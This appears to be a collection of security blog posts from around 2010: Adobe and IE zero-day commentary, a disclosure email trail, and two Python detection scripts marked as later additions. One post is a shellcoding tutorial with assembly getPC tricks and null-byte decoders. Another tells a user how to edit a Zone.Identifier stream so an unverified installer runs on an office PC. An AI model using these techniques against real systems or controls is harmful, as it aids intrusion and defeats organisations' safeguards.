Thoughts on Haiti, Olympics, and other disasters

Absent those who have gone gaga over the iPad, the top news for the past two weeks has been the earthquake and disaster in Haiti.  The concern, the outpourings of support (and, yes, the malware and phishing sites that have been attempting to capitalize on the crisis) are all reminiscent of the tsunami, Katrina, and other events stretching back in time.

Haiti has been different.  The major factor has been the total breakdown of infrastructure, and the consequent difficulty in getting the help to those who need it most.

Those of us in the security communities are always interested in disasters.  We are forever dealing with crises, both large and small, assessing risks, planning and comparing mitigation strategies, and looking at the management of it all.  So, I recall that, when Katrina struck, there were endless discussions of the latest details, the structures, the organization (and lack thereof) in the followup efforts.  One person made a donation to a charity, and challenged the group to match his gift.  I upped the stakes.  I challenged everyone to get trained for disasters.

Unfortunately for the point I’m trying to make, I am speaking from a position of privilege.  Canada has the best emergency structure in the world.  (Our disaster response team is in Haiti at the moment, and is always one of the first on the ground whenever there is a major incident, anywhere.)  British Columbia has the best emergency response management system in Canada.  (No, I’m not volunteering at the Olympics.  But for the past year, I’ve been working with a group that has been planning for the fact that, with the big event in town, even a minor crisis is probably going to mean that we may have to provide emergency lodging for a few hundred people.)  And the North Shore, where I live, has the best disaster training regime in BC.  (The group lodging thing isn’t done by VANOC: it’s an effort by the ESS volunteers from the North Shore, Vancouver, and Richmond.)

Emergency response, in a major disaster, is not simply a matter of having water, generators, blankets, and rescue dogs.  It has to do with organization, co-ordination, management, and, particularly, trained people.  Most of them volunteers, since nobody can afford to pay for a full-time staff of all those you need to have ready in an emergency.

That’s where you come in.

Get trained.

There is some emergency measures organization that covers your area, regardless of where you live.  Your local municipality probably has an office.  And they probably need volunteers.  And they provide training.

If you volunteer, you will probably get trained.  For free.  (You may also get additional perqs.  I get my flu shots paid for every year, since I’m an emergency worker.)

First of all, you’ll probably get trained on what you need for you and your family.  What do you need to survive the first 72 hours following a disaster?  Do you know how much water, what type of food, etc, you need, in the event of a total failure of utilities and other factors we rely on?

Then there are the skills you need to help other people.  Sometimes this might relate to first aid, or structural assessment of buildings after an earthquake, etc.  However, there are many necessary skills that are not quite so dramatic.  Most emergency response, believe it or not, has to do with paperwork.  Who is safe?  Who needs care?  Do families need to be reunited?  Documentation of all of this is a huge effort, which goes on long after the bottles of water and hot meals have been distributed.

Then there are management skills, to co-ordinate all of the other skills.  An awful lot of “charity” gets wasted because some people get too much help, and others don’t get enough.  Someone needs to oversee the efforts.

Training in all of this is available.  And, in an emergency, having trained people is probably more important than having stockpiles of tents.  Trained people can make or improvise shelter.

Maybe your municipality or county doesn’t have a formal emergency structure.  In that case, there are organizations covering the gap.  In Canada, the government doesn’t do it all.  The Red Cross and Salvation Army are two of the groups that have been working on this for years, and have specialists.  In BC we have courses provided by the Justice Institute in a number of areas.  The provincial government has created a marvelous structure, ensuring consistent organizational layout for all sizes and types of disasters, and all types of response.  But we don’t bother reinventing the wheel.  In our formal training curriculum, a number of the courses are prepared, provided and run by the groups that have been doing it for years, and know it best.  If your government doesn’t have the courses available, go to those who do.  They are around.

(For those who have security related certifications, like the CISSP, ongoing professional education is a requirement.  A constant complaint is that training is expensive, and getting the credits costs too much.  I get all kinds of training related to business continuity and disaster recovery.  I get almost all of it free.)

Get trained.  Volunteer.  You’ll get a wealth of experience that will help you plan for all kinds of events, not just for major disasters, but for the minor incidents that plague us and our companies every day.  You’ll be ready for the big stuff, too.  You’ll be able to keep yourself and those near to you safe.  You’ll be able to make a difference to others, certainly reducing suffering, and possibly saving lives.  If and when something major happens, you will be a part of the infrastructure necessary for the response to be effective.  You’ll be part of the solution, rather than part of the problem.


Mac Virus update

I know, there ain’t no such thing!

Well, we could have a lively debate on that topic, but not right now.

On this occasion, I’m just letting anyone who wonders what happened to the Mac Virus web site (http://www.macvirus.com), which I inherited from Susan Lesch some years ago, know what’s happening with it. We have nothing to do with the cobwebby sites at http://www.macvirus.net and http://www.macvirus.org, or with http://macvirus.wordpress.com, whatever that is.

The http://www.macvirus.com URL actually redirects to my own Mac page at the Small Blue-Green World site, which now re-redirects to a WordPress page. If you want to go straight to the Mac Virus blog, you can go direct here. It’s still malware-oriented, of course, and is likely to become more rather than less active in that area.

In fact, most of my Small Blue-Green World content now resides on blog pages. ESET content is still blogged at http://www.eset.com/threat-center/blog/, of course, and AVIEN content is blogged at http://avien.net/blog/.

Confused? Me too…

We now return you to your normal programming. Scheduling, that is, not coding. Unless that’s what you’re doing at the moment. Oh, never mind.

The next time I blog here, it will be about a proper security issue again. I hope.

David Harley FBCS CITP CISSP
Security Author/Consultant at Small Blue-Green World
Chief Operations Officer, AVIEN
ESET Research Fellow & Director of Malware Intelligence

Also blogging at:
http://avien.net/blog
http://www.eset.com/threat-center/blog
http://smallbluegreenblog.wordpress.com/
http://macviruscom.wordpress.com
http://blog.isc2.org/
http://dharley.wordpress.com


So Microsoft has known about the IE vulnerability (CVE-2010-0249) since last September.

So, let me get this straight, MS was informed about this vulnerability by a security researcher (Meron Sellen) last August, and it’s sat in the Microsoft Security Response Center’s queue to be fixed until Google got hacked, and then they checked their queue to see if they knew about it?

Even though this was acknowledged in September, and MS planned to ship the patch in a cumulative IE update next month, so that’s 6 months, really? Wow, I thought that Adobe had it tough with not having enough developers to patch.
This really makes me question the world’s largest OS developer, I have to say. The following questions come to mind though.

- If this was passed to them last September, do they have that many bugs in their code that they haven’t gotten around to this one yet?

- What happened to MS’s secure development program if something like this can get missed?

- As it’s the fault of a software development house that another 33 companies were hacked, will any legal action be taken against them for this?

- Will/Could Google sue MS for damages if they do decide to pull out of China because of this hack?

Just random thoughts, but hey…


How not to handle a responsible XSS disclosure!

Okay, so a few days ago I found a ton of XSS vulnerabilities on various high profile web sites, and on the whole, after eventually managing to contact the relevant teams for the sites, everyone was very grateful.

When will web site owners learn that it’s a good idea to have a security contact e-mail address on their sites!

However there was one, whose name I’m not going to mention here, that came back to me with the worst possible answer ever.

This is an online retailer, and my e-mail went to their help desk, but still!

Here’s the full e-mail trail (I’ve removed certain bits of info though, so that the site or the attack vector cannot be identified). Please also note that due to the nature of what this company does they are required to be PCI DSS compliant.

===============================

-----Original Message-----
From: xyberpix [mailto:xyberpix@blahblah.com]
Sent: 05 January 2010 07:53
To: help@xxx.com
Subject: Website enquiry: General - www.xxx.com

Sent Date: 2010-01-05 07:52:58 (GMT/UTC)

Hi There,

I have discovered a security vulnerability on your web site, and would like to please disclose this to yourselves responsibly. Could you please either contact me with the name of someone who I should report this to, or could you please get someone to contact me at this e-mail address please. If this could please be treated as urgent.

Thank you
xyberpix

===================================
On 5 Jan 2010, at 16:40, XXX Support User2 wrote:

Hi Xyberpix,

Thank you for your email message.

Can I please ask you to supply the screenshot of the page so that we can look into this for you?

I look forward to your reply, upon which I will do my very best to assist you.

Kind Regards,
Alex | Customer Services Representative
Note: Please do not delete the previous correspondence if you are replying to this e-mail. This will help us to assist you better. www.xxx.com

===================================

-----Original Message-----
From: xyberpix [mailto:xyberpix@blahblah.com]
Sent: 05 January 2010 16:59
To: XXX Support User2
Subject: Re: XXX

Hi Alex,

No problem at all please find attached a screenshot.

Also the string that was used in the main search bar to prove this was the following:

‘;alert yadayadayada

Kind Regards,
xyberpix

==================================

Hi,

Thank you for contacting us and sorry for the inconvenience caused here.

May I kindly request you to clear the cache and cookies from your internet browser and then try placing your order opening a new browser.

If you have any further queries please do let us know.

Kind Regards,
Edwin | Customer Services Representative
XXX!

Note: Please do not delete the previous correspondence if you are replying to this e-mail. This will help us to assist you better.


Vendor response to vulnerability disclosure

My wish for 2010: I want this guide to be taught in CS classes to developers everywhere:

http://vrt-sourcefire.blogspot.com/2009/12/matts-guide-to-vendor-response.html

Happy new year everybody.


Signs of the (end) times …

Rev. 6:6, OCD [1]

“Then it was as if I heard a voice saying: And they shalt go into the storehouses, and look there for the snack foods made from corn [2] which the hands of men have made into hollow cones or cornets [3].  And they shall go unto the Save-On, and unto the Shoppers Drug Mart, and unto the Safeway, and even unto the Zellers, which is the store of last resort when old stock is being cleared out.  And they shall find them not.  And, having no proper snack foods for the parties of the new year, the new year shall come not, and thus shall be the end of times.”

[1] Old Canadian Deviant translation, as opposed to the New American Standard

[2] Some ancient manuscripts add: “And this is not that barelycorn which was known even in Ur of the Chaldees, but that which came from the land newly found by him who gave his name unto a seventies TV detective show, but of whom we may not, at this time, speak”

[3] Scholars debate the meaning of this word.  Most believe that it is simply a reference to “little objects made from corn.”  However, some feel that it is similar to the word for “trumpets,” or, possibly “bugles.”


Adobe 0-Day (CVE-2009-4324) Fix To Be Pushed 12th January 2010

Well, what more can I say really? Good old Adobe have decided that it’s better to hold off on this patch than to have people working around the clock to try and get this out asap. I suppose they also need to have some time off; after all, it is close to Yule, and, well, they have been really good at releasing patches in a reasonable timescale this year (cough!).

This is the statement from Adobe, which can be found here.

We posted an update to Security Advisory APSA09-07 that reflects the target ship date of January 12, 2010 for the update to remediate vulnerability CVE-2009-4324. I thought folks might be interested in some of the analysis that went into developing the schedule for the fix, so let me share some of the details in this post.

We evaluated two different options for patching this vulnerability:


  1. Stop everything else and start work immediately on an out-of-cycle security update to resolve this vulnerability with a one-off fix. We made major investments as part of our security initiative earlier this year that allow us to deliver patches more quickly. We estimated that delivering an out-of-cycle update would require somewhere between two and three weeks. Unfortunately, this option would also negatively impact the timing of the next quarterly security update for Adobe Reader and Acrobat scheduled for January 12, 2010.
  2. Roll the fix for vulnerability CVE-2009-4324 into the code branch for the scheduled January 12, 2010 release. The team determined that by putting additional resources over the holidays towards the engineering and testing work required to ship a high confidence fix for this issue with low risk of introducing any new problems, they could deliver the fix as part of the quarterly update on January 12, 2010.

Two important considerations that contributed to our decision to select the second option:


  • JavaScript Blacklist mitigation - This new feature, introduced in Adobe Reader and Acrobat versions 9.2 and 8.1.7, with the quarterly update in October, allows individuals as well as administrators of large enterprise managed desktop environments to easily disable access to individual JavaScript APIs. More details on the JavaScript Blacklist mitigation are available here. The feature design and our testing for this specific vulnerability indicate the JavaScript Blacklist is an effective mitigation against the threat without breaking other workflows that rely on JavaScript or other JavaScript APIs.

  • Customer schedules - The next quarterly security update for Adobe Reader and Acrobat, scheduled for release on January 12, 2010, will address a number of security vulnerabilities that were responsibly disclosed to Adobe. We are eager to get fixes for these issues out to our users on schedule. Many organizations are in the process of preparing for the January 12, 2010 update. The delay an out-of-cycle security update would force on the regularly scheduled quarterly release represents a significant negative. Additionally, an informal poll we conducted indicated that most of the organizations we talked with were in favor of the second option to better align with their schedules.


This is just a brief description of some of the points we considered in our analysis. Ultimately, the decision came down to what we could do to best mitigate threats to our customers, a critical priority to everyone at Adobe - and one we take very seriously.

I can really see how they are taking this one seriously, as 4 weeks to roll out a critical patch to one of the most widely used applications on the planet really isn’t that bad if you think about it, as that’s got to be at least 2 people working on this one. I actually thought that Adobe had more than a couple of developers, but I guess I was wrong.


Adobe 0-day vulnerability (CVE-2009-4324) - what this means?

SecuriTeam Blogs contains several FAQ documents about MS Office vulnerabilities used in targeted attacks since 2006. This time I’m not writing a FAQ. This document has answers to “What does this mean?” type questions.

What can an organization do to protect itself?

#1 Disable JavaScript. Deploy a system to deliver this setting to all workstations. This is not the last Adobe 0-day we will see.

What does this mean?

Go to the Edit > Preferences menu, select the ‘JavaScript’ item, uncheck “Enable Acrobat JavaScript” and click ‘OK’ to save the setting.

#2 Enable DEP

Some Windows systems include Data Execution Prevention (DEP) functionality.

What does this mean?

If your organization is using Windows versions with DEP support, the code execution can be avoided.

Adobe has confirmed this mitigation advice in security advisory APSA09-07, but, as mentioned, the DEP method doesn’t fully prevent exploitation.

#3 Do not open PDF documents from unknown sources AND received unexpectedly.

What does this mean?

If you don’t know the sender who is sending you file attachments, there is always a risk that you are the victim of a targeted attack. Remember that the sender can easily be spoofed as well.

#4 Switch to alternative PDF reader.

There are many free and commercial products. However, they are often affected by Adobe vulnerabilities too, and a patching policy is needed when switching to another product.

What does this mean?

Changing the PDF reader in a large organization is not an easy move. Today is a good day to start the planning project.

A few words about the technical details. The vulnerability exists in the Doc.media.newPlayer method. The Trojan in these attacks generated connections to http: // foruminspace dot com and http: // newsplaza dot net (these servers are located in Malaysia).

AV vendors use the following names when detecting the malicious PDF document:

Exploit.JS.Pdfka.atq (Kaspersky)

Exploit:W32/AdobeReader.UZ (F-Secure)

Exploit-PDF.ag (McAfee)

PDF/Pidief.NQ (CA)

Trojan.Pidief.H (Symantec)

TROJ_PIDIEF.PGS (Trend Micro)

Troj/PDFJs-FS (Sophos)

The size of the infected PDF document is 400,918 bytes. The file name varies, but it can be note200911.pdf, note_20091210.pdf or Outline of Interview.pdf.
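As an added example (not part of the original post, and not SecuriTeam’s or Adobe’s code), here is a small Python triage script that applies the indicators listed above to PDF files: it flags JavaScript actions, inflates FlateDecode streams so the script text can be inspected for the vulnerable Doc.media.newPlayer API, and matches the reported file size, file names and callback hosts. The sample PDF it builds is constructed for the demonstration and only references the API name; it contains no exploit logic.

```python
"""Static triage of PDF files for the CVE-2009-4324 indicators given above.

Added example, not part of the original post. It flags JavaScript actions,
inflates FlateDecode streams so script text becomes visible, and matches the
indicators the post lists. It is a triage aid, not a substitute for an AV
engine or for the vendor patch.
"""
import re
import zlib

# Indicators taken from the post: vulnerable API, reported sample size,
# reported file names and callback hosts (written undefanged for matching).
VULNERABLE_API = b"media.newPlayer"
SAMPLE_SIZE = 400_918
SAMPLE_NAMES = {"note200911.pdf", "note_20091210.pdf", "Outline of Interview.pdf"}
CALLBACK_HOSTS = (b"foruminspace.com", b"newsplaza.net")

# "stream ... endstream" bodies; the lookbehind stops "endstream" from being
# taken as the start of the next stream.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\n?endstream", re.DOTALL)
JS_ACTION_RE = re.compile(rb"/(?:JS|JavaScript)\b")


def inflate(chunk: bytes) -> bytes:
    """Return the inflated stream body if it is zlib data, otherwise the raw bytes."""
    try:
        # decompressobj tolerates a truncated tail or trailing whitespace
        return zlib.decompressobj().decompress(chunk)
    except zlib.error:
        return chunk


def scan_pdf(data: bytes, filename: str = "") -> list[str]:
    """Return the indicator tags found in a PDF; an empty list means nothing matched."""
    tags = []
    if JS_ACTION_RE.search(data):
        tags.append("javascript-action")
    # Inspect the raw file plus every inflated stream body.
    bodies = [data] + [inflate(m.group(1)) for m in STREAM_RE.finditer(data)]
    if any(VULNERABLE_API in body for body in bodies):
        tags.append("media.newPlayer")
    if any(host in body for host in CALLBACK_HOSTS for body in bodies):
        tags.append("callback-host")
    if len(data) == SAMPLE_SIZE:
        tags.append("known-size")
    if filename in SAMPLE_NAMES:
        tags.append("known-filename")
    return tags


def build_sample_pdf(js: bytes, compress: bool) -> bytes:
    """Constructed minimal PDF whose OpenAction runs the given JavaScript (test input only)."""
    body = zlib.compress(js) if compress else js
    filt = b"/Filter /FlateDecode " if compress else b""
    return (
        b"%PDF-1.4\n"
        + b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
        + b"2 0 obj << /S /JavaScript /JS 3 0 R >> endobj\n"
        + b"3 0 obj << " + filt + b"/Length " + str(len(body)).encode() + b" >>\n"
        + b"stream\n" + body + b"\nendstream\nendobj\n"
        + b"%%EOF\n"
    )


# Constructed samples: a compressed script that only names the API (no exploit
# logic), so the name is invisible without inflating; and a document with no JS.
SUSPECT_JS = b"var player = this.media.newPlayer; // constructed reference only"
SUSPECT_PDF = build_sample_pdf(SUSPECT_JS, compress=True)
CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"

if __name__ == "__main__":
    print("suspect:", scan_pdf(SUSPECT_PDF, "note_20091210.pdf"))
    print("clean:  ", scan_pdf(CLEAN_PDF, "report.pdf"))
```

Run it over a directory of quarantined attachments by reading each file into scan_pdf; any tag is a reason to hold the file for analysis, while an empty result proves nothing, since real samples can use stream filters other than FlateDecode and obfuscate the script so the API name is assembled at run time.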


Latest Adobe 0-Day Exploit Now In Metasploit

I was just reading through Twitter and saw this from HDM, and thought I’d share:

“Adobe PDF 0.9-day added to Metasploit: [msf> use exploit/windows/fileformat/adobe_media_newplayer.rb] (via jduck/pusscat/myself) SVN r7881”

Night All…


KISS shellcoding and exploitation

In this blog I will talk about anything and everything to do with vulnerability exploitation. This is part of the job I do for SecuriTeam’s SSD. For those who are not aware of the project, its aim is to give researchers compensation for their research efforts, compensation of course being money, not just fame and glory :)
The work I do revolves around exploits and the shellcodes in the exploits that we receive. In this blog post I will focus mostly on simple problems and aspects of writing exploits, and show how I have solved some of these problems in the past.

A common sight when looking for exploitation information is a complicated C-and-ugly-assembly-string exploit or shellcode.  Rather than writing up the 287637639th exploit, I will discuss different problems and goals faced when exploiting and shellcoding.  My main focus will be explaining problems and issues often encountered and offering simple, general approaches to a solution, with an emphasis on working, easy-to-implement solutions.

Rather than building a full (”weaponized”) exploit, I will go through the process of building a PoC.  I may also talk about some simple and effective ways of building an exploit-compilation framework.

I like to start from the beginning, but even seasoned exploiters can already prepare themselves for some surprises and twists.

SHELLCODING PRIMER

One of the main problems encountered when exploiting a vulnerability, even if it is a simple stack overflow, is shellcode restrictions.  Often the nature of the specific vulnerability will prevent us from using specific bytes or force us to use certain combinations.  Obviously, every constraint is different.  Let’s start with the classic “zero-tolerance” restriction: our shellcode cannot contain null bytes, because it was probably originally part of a printable string.

This type of constraint is indeed a classic, textbook example, but it is also a common problem in real-world shellcode writing and exploitation. It is very common in vulnerabilities surrounding textual streams, such as HTML, XML, telnet and others (often these streams can be encoded in Unicode, but that creates different problems).

In the October Patch Tuesday alone we can find that many vulnerabilities, especially those in MS09-054, may require dealing with these limitations (when not serving a Unicode-encoded web page). This is the case with CVE-2009-2529, and with some implementations of an exploit for CVE-2009-2530.  This is probably also the case for CVE-2009-2531 and many other vulnerabilities.

If you have never tackled this problem before, stop reading here, and think of  how you would solve this problem.

The answer is of course a decoder. There are many examples of byte-substitution decoders out there, written in hundreds of lines of C.
Let’s see what the basic concept behind these is. We want to write code that does not contain any null bytes; therefore we will obviously have to substitute something different for the null bytes, or escape them. Does substitution really cut it?

A quick histogram of all the code in kernel32.dll (or choose any other simple DLL) shows us that some bytes tend to appear much less often in code and printable data.
We can simply histogram our shellcode (use Hex Workshop) and choose a magic byte to replace.
[picture-histogram]

Let’s see what stages we need to go through in order to decode our shellcode. I won’t talk about OS-specific issues, though they are mentioned:
- find the position we are running from (aka getPC)
- deal with memory-permission issues
- rewrite our code

Locating home

In order to decode the shellcode we must first be able to find the position we are running from. Unfortunately x86 does not allow direct access to EIP (IA-64 does, somewhat :) ), so we must find it indirectly. We have several methods of accomplishing this, each with benefits and drawbacks. I am already assuming no null bytes are allowed.

We can use the CALL opcode, which will push our position on to the stack.

A naive method using call:
_SIMPLE_CALL_GETPC_
jmp @START_GA
@GET_ADDR:
pop edi                            // get the address that was pushed on to the stack
add edi,(@START_CODE-@RET_ADDR)    // here we calculate our needed address
jmp @DECODE
@START_GA:
call @GET_ADDR                     // this will push the address of @RET_ADDR on to the stack. decodes as “E8FFFF… ”
@RET_ADDR:                         // this address will be pushed
@END_GA:
@DECODE:
[decoder goes here]
@START_CODE:

Or we can use a slightly more sophisticated method:

_CALL_IN_TO_OPCODE_
@GET_ADDR:
call @AFTER_CALL-1                     // (call $-1) == “E8FFFFFFFF”
@AFTER_CALL:
db 0xC8                                // the call’s last 0xFF byte plus this byte execute as “dec eax” (FF C8)
inc eax                                // undoes the dec, so the pair is a fancy NOP
@RET_ADDR:
pop edi                                // edi = @AFTER_CALL-1, the address the call pushed
add edi,(@START_CODE-(@AFTER_CALL-1))  // so the offset is taken from that address, not from @RET_ADDR

@END_GA:
@DECODE:
[decoder goes here]
@START_CODE:

What I did here is call into the call opcode itself. This way the call will be to end-of-opcode minus 1, which results in an opcode encoding that does not contain null bytes, but 0xFFFFFFFF instead. This is because part of the opcode contains the jump distance and direction, in this case -1. After the call, a ‘dec eax’ (”FFC8″) opcode will be executed.  I could have easily executed a slightly different opcode, but this one is fairly harmless, and after adding an ‘inc eax’ this results in a fancy NOP.

Another option would be to just use an existing function that can be called (e.g. from Windows using the syscall gateway):
_CALL_EXISTING_FUNCTION_
xor eax,eax
push eax
add eax, 0x3E       // this can be changed to anything which will not cause damage on the specific OS. in this case ntclosefile(NULL);
mov edx, 0x7FFE0301 // windows “syscall gateway” pointer, +1 so the immediate contains no null byte
dec edx
mov edx, [edx]
call edx            // this will perform an os-specific syscall
@RET_ADDR:
mov edi, [esp-4]    // the return address the call pushed is still just below esp
add edi,(@START_CODE-@RET_ADDR)
@END_GA:
@DECODE:
[decoder]
@START_CODE:

That’s about it for using call. Another nice trick is using some FPU opcodes:

fld1
fstenv [esp-0xC]    // push the FPU state onto the stack, including the address of the last executed FPU opcode (fld1). this can be replaced by fsave/fnstenv/fxsave/some other?
pop edi
add edi,…

A completely different approach would be to copy our code to a known place. Let’s choose 0x7FFE0410 for Windows (assuming no NX bit is present and we know the space is not in use, and disregarding the fact that we cannot in reality write to this address, as it is read-only from user mode).
_COPY_THE_CODE_
mov eax, 0x7FFE0410                 // (0x7FFE0300+0x110)
[eax = shellcode_position]
mov dword ptr [eax], 0x90909090     // NOPNOPNOPNOP - the perfect shellcode
jmp/call eax

When copying a larger shellcode this will not be very compact; in order to use string operations we will have to getPC anyway.  A variant of this method is the famous “SEH method”, which essentially does the same, except that it uses an interrupt to eventually jump to where the code was copied.
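Turning this section around to the defender’s side, here is an added Python example (mine, not from the post) that recognises the getPC idioms just described in a byte buffer: a short backward CALL whose target is a POP (the jmp/call/pop pattern), the call-into-its-own-opcode E8 FF FF FF FF variant, and the FNSTENV [esp-0xC] trick. The opcode encodings are standard x86; the 0x80 backward-distance limit and the sample buffers are my own choices.

```python
"""Heuristic detector for the getPC idioms discussed above (added example)."""
import struct

# Standard x86 encodings: E8 rel32 = CALL, 0x58..0x5F = POP r32,
# D9 74 24 F4 = FNSTENV [esp-0xC] (the 9B-prefixed FSTENV form contains the
# same four bytes). The backward-distance limit is an assumption of this example.
CALL_REL32 = 0xE8
FNSTENV_ESP_MINUS_C = bytes.fromhex("d97424f4")
MAX_BACKWARD_CALL = 0x80


def is_pop_r32(opcode: int) -> bool:
    """True for the one-byte POP r32 opcodes (pop eax .. pop edi)."""
    return 0x58 <= opcode <= 0x5F


def find_getpc(buf: bytes) -> list[tuple[int, str]]:
    """Return (offset, tag) for every getPC idiom found in buf.

    Byte-level heuristics like these see through no obfuscation and can fire
    on ordinary code, so treat hits as a reason to look closer, not as proof.
    """
    hits = []
    n = len(buf)
    for i in range(n):
        if buf[i] == CALL_REL32 and i + 5 <= n:
            rel = struct.unpack_from("<i", buf, i + 1)[0]
            target = i + 5 + rel
            if rel == -1:
                # call $-1: execution resumes inside the call's own last 0xFF
                # byte, and the encoding E8 FF FF FF FF contains no nulls.
                hits.append((i, "call-into-own-opcode"))
            elif -MAX_BACKWARD_CALL <= rel < 0 and 0 <= target < n and is_pop_r32(buf[target]):
                # jmp/call/pop: a short backward call whose target immediately
                # pops the pushed return address into a register.
                hits.append((i, "backward-call-to-pop"))
        elif buf.startswith(FNSTENV_ESP_MINUS_C, i):
            # fnstenv stores the FPU environment; its instruction-pointer field
            # (address of the last FPU instruction, e.g. fld1) lands at [esp]
            # when written to [esp-0xC], and a pop shortly after reads it.
            if any(is_pop_r32(b) for b in buf[i + 4 : i + 8]):
                hits.append((i, "fnstenv-esp-0xC"))
    return hits


# Constructed sample buffers (not captured from any real exploit).
JMP_CALL_POP = bytes.fromhex("eb05" "5f90909090" "e8f6ffffff")  # jmp +5; pop edi; nops; call -10
CALL_MINUS_ONE = bytes.fromhex("e8ffffffff" "c8" "40" "5f")      # call $-1; (ff)c8 dec eax; inc eax; pop edi
FPU_GETPC = bytes.fromhex("d9e8" "d97424f4" "5f")                # fld1; fnstenv [esp-0xC]; pop edi
PLAIN_DATA = bytes(16) + b"ordinary buffer contents"

if __name__ == "__main__":
    samples = [("jmp/call/pop", JMP_CALL_POP), ("call $-1", CALL_MINUS_ONE),
               ("fpu", FPU_GETPC), ("plain", PLAIN_DATA)]
    for name, sample in samples:
        print(f"{name:12s} -> {find_getpc(sample)}")
```

The fld1 in the FPU sample also happens to contain an E8 byte, which the scanner examines and rejects because the rel32 that follows is neither -1 nor a short backward distance to a POP; that is the kind of near-miss a byte heuristic has to filter, and why a hit should be confirmed by disassembling around the offset rather than acted on alone.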

Decoding
Now that we have found our own code base, we can replace our escaped or substituted bytes.  Here are two simple hack decoders which are easy to implement and are good enough in many cases. They will only work if we have a byte value which does not appear in the code/data, as discussed above.

XOR_IT_ALL:

jmp @START_GA
@GET_ADDR:
pop edi
add edi,(@END_DECODER-@RET_ADDR)   ; edi now points at the first encoded byte
jmp @DECODE
@START_GA:
call @GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER     ; smaller than 0x7f. can be done multiple times
mov al, 0xA7                       ; the magic byte

@REPLACE_NEXT:
mov bl, byte ptr [edi]
xor bl,al
mov byte ptr [edi],bl              ; write the decoded byte back in place before moving on
inc edi
loop @REPLACE_NEXT

@END_DECODER:
NOP
NOP
NOP
NOP
NOP
@END_CODE:

Here we XOR’d the whole code with the magic byte. If this magic byte did not exist in the original code, then 0x00 will not exist in the encoded code. A different method:

SEARCH_AND_DESTROY:
jmp @START_GA
@GET_ADDR:
pop edi
add edi,(@END_DECODER-@RET_ADDR)   ; edi now points at the first encoded byte
jmp @DECODE
@START_GA:
call @GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER     ; smaller than 0x7f. can be done multiple times
cld
mov al, 0xA7                       ; the magic byte that stands in for 0x00
xor dl,dl                          ; the null byte we write back

@REPLACE_NEXT:

repnz scasb                        ; scan forward for the magic byte; stops with edi one past it
jne @END_DECODER                   ; ran out of bytes without a match: nothing left to patch
mov byte ptr [edi-1],dl            ; put the null byte back in place
test ecx,ecx
jnz @REPLACE_NEXT
@END_DECODER:
NOP
NOP
NOP
NOP
NOP
@END_CODE:

In order to build a more robust decoder which supports escaping or alphanumeric encoding, it is possible to write one from scratch in assembly. SkyLined has written a very elegant decoder at http://skypher.com. Another option is to have a small, hacked, custom-adapted decoder like the one we just wrote decode a bigger decoder written in C. In the next upcoming post I will show how I tried (and succeeded) in building shellcode which has gone through a process of ASCII-to-Unicode conversion. This shellcode will have to be written so that every second byte, and only every second byte, is a null byte. Try this at home, and let me know if you have anything good.

Leaving you with one more point for thought: shellcode that will run on x86 and on x64.


Using Nmap Remotely Through F5 FirePass VPN

Well, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.
I was connected to a network remotely through the company’s F5 VPN appliance and I wanted to scan the internal network.

It looked like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 192.168.1.*

Once I pressed “Enter” I got:
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard Time
WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won’t work on Windows.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 5 seconds then retry.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 25 seconds then retry.

Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening adapter: The system cannot find the device specified. (20)

There are several possible reasons for this, depending on your operating system:
LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.

*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV ; or use mknod).

*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2. Depending on the reason for this error, it is possible that the --unprivileged command-line argument will help.

SOLARIS: If you are trying to scan localhost or the address of an interface and are getting ‘/dev/lo0: No such file or directory’ or ‘lo0: No DLPI device found’, complain to Sun. I don’t think Solaris can support advanced localhost scans. You can probably use “-PN -sT localhost” though.

QUITTING!

Then I realized that the VPN connection was a PPP device, which is probably at the top of the device type interface order list, and Nmap was trying to use it for the scan. That is the point of failure, because Nmap on Windows without raw sockets (meaning Windows XP SP2 and later) can only use Ethernet devices. So I played “Imaginary Linux on Windows” and added the option “-e eth0”, which specifies using the Ethernet device indexed at 0, and it worked like a charm.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 -e eth0 192.168.1.*

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time
Interesting ports on XXXXX (192.168.0.1):
PORT STATE SERVICE
445/tcp filtered microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds


Bypassing Windows Unknown Publisher Verification For Web Downloaded Executables

I was in another day of jumping from client to client, securing another bank in Israel, when my girlfriend called and said “Honey, I am at the office, I have absolutely nothing to do and I can’t connect from here to our computer at home to continue my project”. I said, O.K, let’s see what we can do on a 5 minute phone call. Now, just to make it clear: my girlfriend is an Information Systems instructor, she is no developer or hacker.

Me: “Honey, go to http://www.teamviewer.com, can you download it?”
Her: “yes, but when I run the setup.exe it says something weird like ‘windows has blocked this software because it can’t verify the publisher’ and it won’t let me install”


Me: “O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start->Run. Now add ‘:Zone.Identifier’ just before the last quotes. What do you see?”
Her: “I see something like ZoneId=3, now what?”
Me: “I can’t talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye”

After 10 minutes I get an SMS “thanks honey it worked!!!”.
